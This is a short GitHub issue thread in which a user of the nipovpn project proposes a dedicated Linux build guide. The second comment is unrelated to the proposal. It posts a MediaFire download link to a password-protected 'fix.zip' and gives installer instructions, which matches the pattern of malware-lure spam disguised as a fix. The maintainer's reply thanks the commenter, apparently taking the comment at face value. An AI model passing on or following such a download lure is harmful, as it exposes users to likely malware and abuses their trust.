### ISSUE TITLE
Dedicated document for build guide

### ISSUE THREAD

**Issue by SirzechsLucifer666** [MortezaBashsiz/nipovpn#82]
I propose creating a dedicated document for the Linux build guide and linking it to the main README file. We can also develop a Windows build guide in the future.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MortezaBashsiz** [comment]
Thanks for your contribution, I truly appreciate it.
I will wait for your pull requests.
